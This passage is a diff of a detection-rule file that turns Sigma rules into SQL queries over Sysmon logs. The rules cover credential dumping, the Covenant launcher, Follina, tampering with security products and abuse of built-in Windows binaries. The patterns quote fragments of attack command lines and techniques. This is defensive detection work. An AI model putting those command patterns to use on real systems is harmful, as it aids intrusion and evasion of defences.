"8c7090c3-e0a0-4944-bd08-08c3a0cecf79", + "status": "stable", + "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", + "author": "@41thexplorer, Microsoft Defender ATP", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", "attack.execution", - "attack.t1569.002" - ], - "falsepositives": [ - "False positives may occur if a user called rundll32 from CLI with no options" + "attack.t1059.001" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine IN ('rundll32.exe', 'rundll32'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_without_parameters.yml" + "filename": "proc_creation_win_apt_tropictrooper.yml" }, { - "title": "Phishing Pattern ISO in Archive", - "id": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "title": "Microsoft IIS Connection Strings Decryption", + "id": "97dbf6e2-e436-44d8-abee-4261b24d3e41", "status": "experimental", - "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", + "author": "Tim Rauch", "tags": [ - "attack.initial_access", - "attack.t1566" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\Winrar.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\7zFM.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\peazip.exe' ESCAPE '\\') AND (Image LIKE '%\\\\isoburn.exe' ESCAPE '\\' OR Image LIKE '%\\\\PowerISO.exe' ESCAPE '\\' OR Image LIKE '%\\\\ImgBurn.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\aspnet\\_regiis.exe' ESCAPE '\\' OR OriginalFileName LIKE 'aspnet\\_regiis.exe' ESCAPE '\\') AND (CommandLine LIKE '%connectionStrings%' ESCAPE '\\' AND CommandLine LIKE '% -pdf%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_archiver_iso_phishing.yml" + "filename": "proc_creation_win_iis_connection_strings_decryption.yml" }, { - "title": "Serv-U Exploitation CVE-2021-35211 by DEV-0322", - "id": "75578840-9526-4b2a-9462-af469a45e767", - "status": "test", - "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", - "author": "Florian Roth (Nextron Systems)", + "title": "Renamed BrowserCore.EXE Execution", + "id": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", + "status": "experimental", + "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1136.001", - "cve.2021.35211" + "attack.t1528", + "attack.t1036.003" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%whoami%' ESCAPE '\\' AND ((CommandLine LIKE '%./Client/Common/%' ESCAPE '\\' OR CommandLine LIKE '%.\\\\Client\\\\Common\\\\%' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\Serv-U.bat%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'BrowserCore.exe' AND NOT ((Image LIKE '%\\\\BrowserCore.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2021_35211_servu.yml" + "filename": "proc_creation_win_renamed_browsercore.yml" }, { - "title": "HackTool - Hashcat Password Cracker Execution", - "id": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", + "title": "WhoAmI as Parameter", + "id": "e9142d84-fbe0-401d-ac50-3e519fb00c89", "status": "test", - "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", - "author": "frack113", + "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1110.002" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Tools that use similar command line flags and values" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\hashcat.exe' ESCAPE '\\' OR (CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-m 1000 %' ESCAPE '\\' AND CommandLine LIKE '%-r %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%.exe whoami%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_hashcat.yml" + "filename": "proc_creation_win_susp_whoami_as_param.yml" }, { - "title": "LSA PPL Protection Disabled Via Reg.EXE", - "id": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", + "title": "Suspicious Serv-U Process Pattern", + "id": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", "status": "experimental", - "description": "Detects the usage of the \"reg.exe\" utility to disable PPL protection on the LSA process", + "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.010" + "attack.credential_access", + "attack.t1555", + "cve.2021.35211" ], "falsepositives": [ - "Unlikely" + "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND CommandLine LIKE '% /v RunAsPPL %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Serv-U.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_lsa_ppl_protection_disabled.yml" + "filename": "proc_creation_win_servu_susp_child_process.yml" }, { - "title": "Wab/Wabmig Unusual Parent Or Child Processes", - "id": "63d1ccc0-2a43-4f4b-9289-361b308991ff", + "title": "Execute Pcwrun.EXE To Leverage Follina", + "id": "6004abd0-afa4-4557-ba90-49d172e0a299", "status": "experimental", - "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", + "attack.t1218", "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (Image LIKE '%\\\\wab.exe' ESCAPE '\\' OR Image LIKE '%\\\\wabmig.exe' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wabmig.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\pcwrun.exe' ESCAPE '\\' AND CommandLine LIKE '%../%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wab_unusual_parents.yml" + "filename": "proc_creation_win_lolbin_pcwrun_follina.yml" }, { - "title": "Disable Windows IIS HTTP Logging", - "id": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", - "status": "experimental", - "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", - "author": "frack113", + "title": "HackTool - Covenant PowerShell Launcher", + "id": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", + "status": "test", + "description": "Detects suspicious command lines used in Covenant luanchers", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1562.002" - ], - "falsepositives": [ - "Unknown" + "attack.t1059.001", + "attack.t1564.003" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:httplogging%' ESCAPE '\\' AND CommandLine LIKE '%dontLog:true%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%-Sta%' ESCAPE '\\' AND CommandLine LIKE '%-Nop%' ESCAPE '\\' AND CommandLine LIKE '%-Window%' ESCAPE '\\' AND CommandLine LIKE '%Hidden%' ESCAPE '\\' AND (CommandLine LIKE '%-Command%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\')) OR (CommandLine LIKE '%sv o (New-Object IO.MemorySteam);sv d %' ESCAPE '\\' OR CommandLine LIKE '%mshta file.hta%' ESCAPE '\\' OR CommandLine LIKE '%GruntHTTP%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand cwB2ACAAbwAgA%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_iis_appcmd_http_logging.yml" + "filename": "proc_creation_win_hktl_covenant.yml" }, { - "title": "Potential LethalHTA Technique Execution", - "id": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", + "title": "Suspicious Splwow64 Without Params", + "id": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", "status": "test", - "description": "Detects potential LethalHTA technique where the \"mshta.exe\" is spwaned by an \"svchost.exe\" process", - "author": "Markus Neis", + "description": "Detects suspicious Splwow64.exe process without any command line parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.005" + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\mshta.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\splwow64.exe' ESCAPE '\\' AND CommandLine LIKE '%splwow64.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_mshta_lethalhta_technique.yml" + "filename": "proc_creation_win_splwow64_cli_anomaly.yml" }, { - "title": "Suspicious Schtasks Schedule Types", - "id": "24c8392b-aa3c-46b7-a545-43f71657fe98", + "title": "Suspicious Shells Spawned by Java", + "id": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", "status": "experimental", - "description": "Detects scheduled task creations or modification on a suspicious schedule type", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious shell spawned from Java host process (e.g. log4j exploitation)", + "author": "Andreas Hunkeler (@Karneades), Florian Roth", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Legitimate processes that run at logon. Filter according to your environment" + "Legitimate calls to system binaries", + "Company specific internal usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_schedule_type.yml" + "filename": "proc_creation_win_java_susp_child_process.yml" }, { - "title": "DNS Exfiltration and Tunneling Tools Execution", - "id": "98a96a5a-64a0-4c42-92c5-489da3866cb0", + "title": "MpiExec Lolbin", + "id": "729ce0ea-5d8f-4769-9762-e35de441586d", "status": "test", - "description": "Well-known DNS Exfiltration tools execution", - "author": "Daniil Yugoslavskiy, oscd.community", + "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1132.001" + "attack.execution", + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\iodine.exe' ESCAPE '\\' OR Image LIKE '%\\\\dnscat2%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mpiexec.exe' ESCAPE '\\' OR Imphash = 'd8b52ef6aaa3a81501bdfff9dbb96217' OR Hashes LIKE '%IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217%' ESCAPE '\\') AND (CommandLine LIKE '% /n 1 %' ESCAPE '\\' OR CommandLine LIKE '% -n 1 %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml" + "filename": "proc_creation_win_lolbin_mpiexec.yml" }, { - "title": "File With Suspicious Extension Downloaded Via Bitsadmin", - "id": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", + "title": "Potential Tampering With RDP Related Registry Keys Via Reg.EXE", + "id": "0d5675be-bc88-4172-86d3-1e96a4476536", "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of \"reg.exe\" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values", + "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.lateral_movement", + "attack.t1021.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.asax%' ESCAPE '\\' OR CommandLine LIKE '%.ashx%' ESCAPE '\\' OR CommandLine LIKE '%.asmx%' ESCAPE '\\' OR CommandLine LIKE '%.asp%' ESCAPE '\\' OR CommandLine LIKE '%.aspx%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cfm%' ESCAPE '\\' OR CommandLine LIKE '%.cgi%' ESCAPE '\\' OR CommandLine LIKE '%.chm%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jsp%' ESCAPE '\\' OR CommandLine LIKE '%.jspx%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.psm1%' ESCAPE '\\' OR CommandLine LIKE '%.scf%' ESCAPE '\\' OR CommandLine LIKE '%.sct%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.war%' ESCAPE '\\' OR CommandLine LIKE '%.wsf%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.rar%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\Terminal Server%' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD%' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')) AND ((CommandLine LIKE '%Licensing Core%' ESCAPE '\\' AND CommandLine LIKE '%EnableConcurrentSessions%' ESCAPE '\\') OR (CommandLine LIKE '%WinStations\\\\RDP-Tcp%' ESCAPE '\\' OR CommandLine LIKE '%MaxInstanceCount%' ESCAPE '\\' OR CommandLine LIKE '%fEnableWinStation%' ESCAPE '\\' OR CommandLine LIKE '%TSUserEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSAppCompat%' ESCAPE '\\' OR CommandLine LIKE '%IdleWinStationPoolCount%' ESCAPE '\\' OR CommandLine LIKE '%TSAdvertise%' ESCAPE '\\' OR CommandLine LIKE '%AllowTSConnections%' ESCAPE '\\' OR CommandLine LIKE '%fSingleSessionPerUser%' ESCAPE '\\' OR CommandLine LIKE '%fDenyTSConnections%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_bitsadmin_download_susp_extensions.yml" + "filename": "proc_creation_win_reg_rdp_keys_tamper.yml" }, { - "title": "Logon Scripts (UserInitMprLogonScript)", - "id": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", + "title": "Regsvr32 Flags Anomaly", + "id": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", "status": "test", - "description": "Detects creation or execution of UserInitMprLogonScript persistence method", - "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", + "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1037.001", - "attack.persistence" + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ - "Exclude legitimate logon scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%UserInitMprLogonScript%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%netlogon%.bat%' ESCAPE '\\' OR CommandLine LIKE '%UsrLogon.cmd%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\WINDOWS\\\\Explorer.EXE%' ESCAPE '\\') OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\proquota.exe' ESCAPE '\\' OR Image LIKE '%\\\\Citrix\\\\System32\\\\icast.exe' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '% /i:%' ESCAPE '\\') AND NOT (CommandLine LIKE '% /n %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_persistence_userinitmprlogonscript.yml" + "filename": "proc_creation_win_regsvr32_flags_anomaly.yml" }, { - "title": "VMToolsd Suspicious Child Process", - "id": "5687f942-867b-4578-ade7-1e341c46e99a", + "title": "Regsvr32 Spawning Explorer", + "id": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", "status": "experimental", - "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", - "author": "behops, Bhabesh Raj", + "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", + "author": "elhoim", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1059" + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ - "Legitimate use by administrator" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'RUNDLL32.EXE', 'REGSVR32.EXE', 'wscript.exe', 'cscript.exe'))) AND NOT ((CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweron-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweroff-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\resume-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\suspend-vm-default.bat%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" + "filename": "proc_creation_win_regsvr32_spawn_explorer.yml" }, { - "title": "Wusa Extracting Cab Files From Suspicious Paths", - "id": "c74c0390-3e20-41fd-a69a-128f0275a5ea", - "status": "experimental", - "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Tampering With Security Products Via WMIC", + "id": "847d5ff3-8a31-4737-a970-aeae8fe21765", + "status": "test", + "description": "Detects uninstallation or termination of security products using the WMIC utility", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administration" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%product where %' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/nointeractive%' ESCAPE '\\') OR (CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%caption like %' ESCAPE '\\' AND (CommandLine LIKE '%call delete%' ESCAPE '\\' OR CommandLine LIKE '%call terminate%' ESCAPE '\\')) OR (CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%where %' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%carbon\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%cylance\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%endpoint\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%eset\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%malware\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Sophos\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%symantec\\%%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG %' ESCAPE '\\' OR CommandLine LIKE '%Carbon Black%' ESCAPE '\\' OR CommandLine LIKE '%CarbonBlack%' ESCAPE '\\' OR CommandLine LIKE '%Cb Defense Sensor 64-bit%' ESCAPE '\\' OR CommandLine LIKE '%Crowdstrike Sensor%' ESCAPE '\\' OR CommandLine LIKE '%Cylance %' ESCAPE '\\' OR CommandLine LIKE '%Dell Threat Defense%' ESCAPE '\\' OR CommandLine LIKE '%DLP Endpoint%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Detection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Protection%' ESCAPE '\\' OR 